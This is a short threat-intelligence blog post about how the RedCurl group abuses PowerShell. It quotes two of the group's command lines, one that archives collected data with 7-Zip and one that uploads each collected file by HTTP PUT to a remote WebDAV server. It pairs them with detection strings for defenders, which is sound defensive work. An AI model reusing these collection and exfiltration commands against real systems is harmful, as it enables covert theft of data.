046. RedCurl Abuses PowerShell for Collection and Exfiltration: Detection Opportunities

Hello everyone! Let's look at another curious case of PowerShell abuse. This time adversary used it for data collection and exfiltration.


I took the following examples from eSentire report on RedCurl (we track this activity cluster as Red Wolf).  

The first example shows how the adversary uses 7-Zip to archive collected data:

powershell -c "gci .*.exe | foreach {if(($.VersionInfo).InternalName -eq '7za'){$syspack = $.Fullname}};$a1='x';$a2='-aoa';$a3='-p'+$env:ppass2;$a4=$env:util;$a5='-o'+$env:tdir;&$syspack $a1 $a2 $a3 $a4 $a5;"

Look at that variable name - $syspack. The cluster loves this name and also used it for naming Z-Zip binary. From detection perspective, you can focus on PowerShell executions with "gci" (Get-ChildItem), ".exe" and "7za", as well as command line parameters commonly used by the threat actor with 7-Zip - "x", "-aoa", "-p" and "-o".

The second example - collected data exfiltration with PowerShell:

powershell -c "$PSW01 = New-Object -ComObject MSXML2.ServerXMLHTTP;$AFS = New-Object -ComObject ADODB.Stream;$AFS.Open();$AFS.Type = 1;Get-ChildItem .$env:trdir | Where-Object {$.PSIsContainer -eq $false;} | foreach {$AFS.LoadFromFile($.FullName);$AFB = $AFS.Read();$PSW01.Open('PUT', $env:davstr+'/'+$env:davfld+'/'+$_.Name, $False, $env:slog, $env:spass);$PSW01.Send($AFB);};$PSW01.Close;"

As you can see, here we also have quite a few command line arguments we can use for detection, for example, "MSXML2.ServerXMLHTTP", "LoadFromFile", "PUT" and "Send".

PowerShell enables adversaries to solve almost any task, so it's very important to track various procedure examples!

See you tomorrow!

Comments

Popular posts from this blog

033. Free Google Threat Intelligence Course

001. The Zeltser Challenge

012. They Want to Know Everything About Your System!